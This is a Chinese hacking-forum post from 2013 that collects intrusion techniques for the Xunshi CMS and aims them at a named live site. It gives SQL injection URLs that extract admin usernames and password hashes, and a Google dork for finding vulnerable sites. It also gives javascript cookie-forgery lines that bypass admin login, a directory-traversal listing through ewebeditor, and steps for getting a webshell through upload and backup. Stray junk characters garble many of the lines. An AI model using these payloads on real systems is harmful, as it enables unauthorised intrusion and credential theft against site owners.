找回密码
 立即注册
查看: 3077|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
; T7 Q$ Q& T5 u% _! X/ \% t8 C0 _0 x  A$ b2 D2 l: \- D, P9 |9 K
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
1 |2 s' q! o1 R5 l8 O+ j$ H" @" p; _5 E2 \. h% U) }
以下本文总结来自黑防去年第9期杂志上的内容...
, [8 c9 H% k1 d$ A! v8 u5 x. q
1 x$ J. M, Z# j0 R4 x. z) F先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%. J  w+ m) e0 K. D
; I& {" O% O3 t3 K1 j
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
! P9 W, I/ a1 i% K$ U' y! w' _/ W% J: `- ~/ F3 b9 O5 L
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况" s8 P% L, a* V7 |3 `- J
这里一个注入
% X; q9 g- V3 p  O# f! ?% ^3 B0 I9 ?/ g! \) ~* {1 `
效果如图:6 `0 A2 G; i$ E5 l

/ V+ C- w2 X% J/ G3 v" q" H ' R: ?+ V( U' q" o  ?

  p  ]* E! \. l5 A这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
+ w! ?$ c# j* {# G  U% p1 q. C2 r- ^9 S# x& h0 a0 e
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
6 [; n) V! e6 U, `
  U! y* D! I/ F3 Hjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
& p: O- r. q& R! ~0 i4 b# c2 P* S$ J2 O# b! H- E2 c  [2 c# N
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:9 P" o; G3 [5 b: c

% E' ~' X4 P) c  p! ~因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
$ u  s5 C9 x1 \) B8 ^6 F
3 k7 N# Y! R8 S' a- R3 t它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
% v8 A3 f! m! d  @* k. W8 E, A- _( P1 u/ \
访问这页面来列目录..步骤如下:
0 {. z: E' }5 H' K% U5 [; C! c2 g+ k; i, A. K9 x9 D
javascript:alert(document.cookie="admindj=1")
# n8 K' x) K' y; @" H" u& R  Y9 r1 r% j( M' l
http://www.political-security.co ... asp?id=46&dir=../..0 b8 c0 }$ O. X' H' C% l  ]* F3 k
! N) E; h, Y- l! ^% a- I  b3 C* m
效果如图:  f4 d8 J% c% E  A) @4 m: J+ X

  t& K% k& y$ {: j1 V- o4 M& P  _ & n( @% {/ [5 _( o. U

3 j$ _# I" a6 s: s. ?: b这样全站目录都能瞧了..找到后台目录..进去..! @% V' _) v) o. e( \
$ p0 y$ w! o( ~' H
那么进了后台怎么拿shell??上传--备份就ok了..3 b) P+ j+ x7 w$ f4 K; u" A7 f

4 l: Q4 S$ \+ {( y. i7 `" P那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..0 G) O& t. A$ z5 j% b
; L0 l& f4 p( e. b2 ?* e
这个我也碰到过一次..你都可以通过列目录来实现..9 N( Q3 {, z# R7 R8 x5 M6 ?. }

' y0 w6 T+ C5 J  }  o6 k$ f' I1 k9 Mjavascript:alert(document.cookie="admindj=1") 0 L, j% p5 N! m8 f, D
& w0 @7 D5 ^& Y8 X  N$ n% a
http://www.political-security.co ... p?action=BackupData
$ q+ s% Y+ w/ X% ]/ o2 o( n5 Q9 U9 V  B! g* U9 r  f  v" z, }0 d
备份ok..
% e% d6 l2 r0 z% |4 F, q% @7 c* l: t5 b
$ H& x: @/ E+ {1 C# q那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
+ R2 X5 h( f# z4 G/ {& ]& V* \, I/ ^6 \; i
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
! ?  e" `- x" l5 d( p  J2 [+ c' r" V; K$ m
然后访问此页面进行注入..步骤如下:" \0 r- ~8 d9 a0 T5 K

5 M! b" d. q! N+ a( {& O( @# Njavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")6 K7 F& M. t, r: P. \+ Q
9 I+ R+ y/ ]) [
然后请求admin/admin_chk.asp页面
- k% E+ v9 y/ J( j2 R0 w+ b; A
' ]- w: @8 L$ F4 E  P1 J) I输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%/ Y. B6 O4 E8 ^; i% C- [

- m( `2 ?/ W% u; H' F! }7 t( k26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
3 L9 X& W* R7 q2 N0 H/ f4 p+ U* m
8 t5 t+ |2 j) I3 e' p  d效果如图所示:
) v: X, O7 I1 a0 X$ t( ?" R# r. y' R) o% j. d4 Z- [

+ f/ k3 B. ?8 a4 U  a3 e; v6 a, T' p- ]
讯时漏洞2" ~( q6 K0 [; A+ h& t
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)9 l& K8 G  n: y+ b/ i2 ]  Z4 Y

. e, O% e; T% @9 Y0 z1、/admin/admin_news_pl_view.asp?id=1
/ _" B' a6 v. G2 \# `" G. l' X//id任意 填入以下语句5 y0 L* I  Y5 x" i  N) @* Q3 t  r+ t
, ^5 V2 k' v' S9 _7 y( R
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!2 K, U9 S- e# S% X4 B' P0 o

$ R0 k1 ?7 ~* T+ p$ t* A2 J" _
% y1 ~8 D' |0 G5 ?) Z/ V( P1 S4 F( _7 {! K- d* }
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=', \- e! |2 K' R* j- z
" K: w* @4 `- ]! p" I
- z! C/ h3 M: N, v

. _  o- W' A! m( x  \, r爆出管理员帐号和密码了
# ]: j8 ]; k6 ~8 R1 r
4 w& x/ W1 N0 T  Z0 x: L+ O3 r, {6 S- y+ p2 g- E" P
" g9 q3 G1 S( E% n% P% r7 h0 N
4、cookies进后台
1 X: R- p0 h: \. \' g / B5 o. I% x6 ~9 c
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));  T2 ~" y! O/ x8 O$ D$ n4 q4 |
. B8 v5 y8 c. q' q  t+ N! k4 _0 {
  [- S, y9 W6 f+ l% u1 v
! d% T- T5 M, U4 ~' B. q6 F
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!( t, }2 D. [' ]9 A0 m

% l5 f/ t& R0 u$ e& o+ g% h1 K! c+ B7 u; e
# X3 R+ N, z) v1 C8 K! ~) C) P
6、后台有上传和备份取SHELL不难。; N9 x! Q( B/ |- q

' s3 f) |8 w' P4 T9 i7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
8 T- V3 f4 P  H# @" ^+ B * F! {9 \8 P: E7 B/ n% \2 {! W
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
' I) m9 Z- b2 a  \* W
6 ?& N# x3 h% x, P- C  `
" R: d: Q' s2 M+ K5 I/ a2 E" G7 _4 l6 c) E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表